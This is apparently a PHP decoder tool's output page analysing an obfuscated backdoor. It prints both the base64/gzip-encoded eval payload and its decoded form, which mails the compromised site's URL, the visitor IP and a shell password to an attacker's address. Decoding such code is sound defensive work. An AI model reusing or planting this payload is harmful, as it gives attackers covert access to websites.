Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $injbuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQog..
Decoded Output download
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
$visitc = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web.$inj);
$judul = "SHELL JCA http://$target by $visitor";
$body = "Bug: $target by $visitor - $auth_pass";
if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);Did this file decode correctly?
Original Code
<?php $injbuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIlNIRUxMIEpDQSBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRvciI7DQogICRib2R5ICAgID0gIkJ1ZzogJHRhcmdldCBieSAkdmlzaXRvciAtICRhdXRoX3Bhc3MiOw0KICBpZiAoIWVtcHR5KCR3ZWIpKSB7IEBtYWlsKCI0eW91NDhAZ21haWwuY29tIiwkanVkdWwsJGJvZHksJGF1dGhfcGFzcyk7IH0NCn0NCmVsc2UgeyAkdmlzaXRjKys7IH0NCkBzZXRjb29raWUoInZpc2l0eiIsJHZpc2l0Yyk7"; eval(base64_decode($injbuff)); eval(gzuncompress(base64_decode("eNpTKU4uyiwoUbBVSMvMSY1PTy2JT87PK0nNKynWUM8oKSmw0tcvSCwuSU3KzNNLzs/VL0os1yvIKLDPtDXzMzSJdDYOUte05uVKLUvM0UivysxLy0ksSdVISixONTOJT0lNzk9J1VCBWKKpqWkNAKtAJkg="))); ?>Function Calls
| gzinflate | 1 |
| gzuncompress | 1 |
| base64_decode | 3 |
| file_get_contents | 1 |
Stats
| MD5 | ce369a9a817b344b808f5f84b71dad9c |
| Eval Count | 2 |
| Decode Time | 89 ms |